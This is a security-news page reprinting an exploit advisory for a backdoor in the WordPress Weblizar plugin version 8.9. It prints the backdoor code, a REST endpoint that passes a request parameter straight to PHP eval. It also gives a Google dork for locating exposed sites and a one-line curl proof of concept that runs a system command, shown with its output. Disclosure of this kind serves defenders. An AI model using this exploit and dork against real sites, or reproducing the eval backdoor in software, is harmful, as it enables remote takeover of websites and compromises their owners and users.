Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Weblizar 8.9 Code Execution

WordPress Weblizar plugin version 8.9 suffers from a remote code execution vulnerability.

Packet Storm
#vulnerability#web#windows#google#linux#js#wordpress#php#backdoor#rce#auth
# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor# Google Dork: 'wp-json/am-member/license'# Exploit Author: Sobhan Mahmoodi# Vendor Homepage: https://weblizar.com/plugins/school-management/# Version: 8.9# Tested on: windows/linuxVulnerable code:add_action( 'rest_api_init', function() {     register_rest_route(           'am-member', 'license',           array(                'methods' => WP_REST_Server::CREATABLE,                'callback' => function( $request ) {                                $args = $request->get_params();                                if ( isset( $args['blowfish'] ) && ! empty($args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )) {                                               eval( $args['blowf'] );                                }                      };                )      );} );If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, andgiven that eval executes the blowf value , Our favorite command must also be in this argument.Proof of Concept:curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www-data)

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6